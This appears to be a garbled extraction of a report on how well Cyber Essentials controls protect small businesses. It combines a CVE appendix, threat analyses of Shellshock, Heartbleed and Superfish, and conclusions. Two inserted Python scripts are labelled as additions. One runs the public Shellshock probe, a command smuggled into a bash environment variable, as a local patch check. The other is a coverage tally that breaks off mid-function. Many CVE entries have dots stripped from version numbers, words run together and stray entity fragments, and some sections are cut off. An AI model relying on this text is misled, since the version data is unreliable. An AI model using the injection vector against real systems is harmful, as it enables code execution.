CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 1300223 and 14x before 1400125 on Windows and OS X and before 112202378 on Linux, Adobe AIR before 1400110, Adobe AIR SDK before 1400110, and Adobe AIR SDK & Compiler before 1400110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 1300223 and 14x before 1400125 on Windows and OS X and before 112202378 on Linux, Adobe AIR before 1400110, Adobe AIR SDK before 1400110, and Adobe AIR SDK & Compiler before 1400110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10x before 10112 and 11x before 11009 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 1300252 and 14x and 15x before 1500223 on Windows and OS X and before 112202418 on Linux, Adobe AIR before 1500356, Adobe AIR SDK before 1500356, and Adobe AIR SDK & Compiler before 1500356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 72 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 72 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R30950 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 614 and 7x before 704, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 614 and 7x before 704, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 712 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 712, Apple OS X before 1094, and Apple TV before 612 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 1094 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 1094 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 712, Apple Safari before 615 and 7x before 705, and Apple TV before 612, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 23 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 755 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 270, Firefox ESR 24x before 243, Thunderbird before 243, and SeaMonkey before 224 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 290, Firefox ESR 24x before 245, Thunderbird before 245, and SeaMonkey before 226 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 320, Firefox ESR 31x before 311, and Thunderbird 31x before 311 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 320, Firefox ESR 31x before 311, and Thunderbird 31x before 311 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 330, Firefox ESR 31x before 312, and Thunderbird 31x before 312 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 3301750149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 3401847137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 3501916114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 11 SP1, 20 SP2, 35, 351, 4, 45, and 451 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 81, Windows Server 2012 Gold and R2, and Windows RT Gold and 81 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 81, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4-S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
certificate, which itself can be easily gathered from any other machine running Superfish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and the issue is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock. Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to close the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their heavy dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.
With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or another security and patching scheme.
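Patch management only mitigates Shellshock once the patch is actually on the box, so the check an SME running Unix/Linux systems wants is a direct one. The following Python script is an added example, not part of the report: it runs the public CVE-2014-6271 probe (a function definition exported through an environment variable with trailing commands) against the local bash. A vulnerable bash executes the trailing `echo vulnerable` while importing its environment; a patched bash ignores it and prints only the marker it was asked to print. `MARKER` is this example's own token, and `classify` is split out so the same decision can be applied to output collected from remote hosts. The probe covers the original bug only; the incomplete-fix follow-ups to Shellshock must be confirmed from the installed package version against the vendor advisory.

```python
"""Local check for CVE-2014-6271 ("Shellshock") in bash.

Added example (not from the Security Lancaster report). The probe below is
the widely published test vector for the original bug: bash versions that
import shell functions from the environment without stopping at the closing
brace will run the trailing command.
"""
import shutil
import subprocess

# The CVE-2014-6271 test vector: a function body followed by an extra command.
PROBE_ENV = {"x": "() { :;}; echo vulnerable"}
# Assumed token for this example; any fixed string that bash would not print
# on its own will do.
MARKER = "cyber-essentials-shellshock-check"


def classify(output: str, marker: str = MARKER) -> str:
    """Decide from bash's stdout whether the probe fired.

    'vulnerable' - the trailing command in the environment ran
    'patched'    - only the requested echo ran
    'unknown'    - output matched neither (wrong shell, sandboxing, etc.)
    """
    lines = output.splitlines()
    if "vulnerable" in lines:
        return "vulnerable"
    if marker in lines:
        return "patched"
    return "unknown"


def check_shellshock(bash_path: str = None, timeout: float = 5.0) -> str:
    """Run the probe against the local bash and return classify()'s verdict,
    or 'bash-not-found' if there is no bash to test."""
    bash = bash_path or shutil.which("bash")
    if not bash:
        return "bash-not-found"
    # Only the probe variable is passed: echo is a builtin, so no PATH is needed,
    # and a minimal environment keeps the result independent of the caller's shell.
    proc = subprocess.run(
        [bash, "-c", f"echo {MARKER}"],
        env=PROBE_ENV,
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return classify(proc.stdout)


if __name__ == "__main__":
    print(check_shellshock())
```

Run it as part of the post-patch verification step rather than relying on the package manager's report alone: the verdict comes from the shell's actual behaviour, which is what an attacker reaching a CGI script or a DHCP client on SME 1 or SME 2 would see.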
Heartbleed. The 'Heartbleed' bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.
SuperFish. All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in closing this vulnerability, as it would require that the administrators be aware of the issue and know of the fix, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, Cyber Essentials patch management fully mitigates it.
Conclusions

The Cyber Essentials controls have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight could not be resolved by the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the affected systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope. It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials controls perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. User education would serve to bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on here, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and available patches, which, as shown in this report, is critical for the CE patch management control to fully mitigate related vulnerabilities.

An important note concerns the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring that all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The controls currently most used could be seen as those providing the most intuitive or easily understood protection (data loss prevention, strong passwords and firewalls), while patch management isn't necessarily understood by individuals as a tool that greatly improves cyber security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that routinely scans the network, hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber safety.
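The proportions quoted above come from the report's Cyber Controls Applicability appendix, where each of the two hundred CVEs is recorded against the four SME networks and the idealised network (does it run the affected product?), the outcome with no controls, and the outcome and credited controls with Cyber Essentials in place. The following Python script is an added example, not code from the report: it parses rows in that layout, computes each control's share of mitigations, and, more usefully for an SME, lists the residual exposure, i.e. the vulnerabilities a given network runs into that Cyber Essentials does not fully mitigate. The eight rows embedded are copied from the appendix; the decision to count a control written as "Secure Configuration (Secure Browser)" under its base name "Secure Configuration" is this example's own.

```python
"""Tally Cyber Essentials control coverage from applicability-table rows.

Added example, not from the Security Lancaster report. Row layout follows
the report's appendix table:

    CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE

The five y/n columns say whether that network runs the affected product,
"No CE" is the outcome without the controls, and "With CE" is
"<outcome> - <comma-separated controls credited with that outcome>".
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

# Eight rows copied from the report's appendix table (the full table has 200),
# embedded so the script runs offline.
SAMPLE_ROWS = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
"""


@dataclass
class Row:
    cve: str
    exposed: Dict[str, bool]   # network name -> runs the affected product
    without_ce: str            # outcome with no controls in place
    with_ce: str               # "Mitigated" / "Partially Mitigated" / "Not Mitigated"
    controls: List[str]        # base names of the controls credited with the outcome


def base_control(name: str) -> str:
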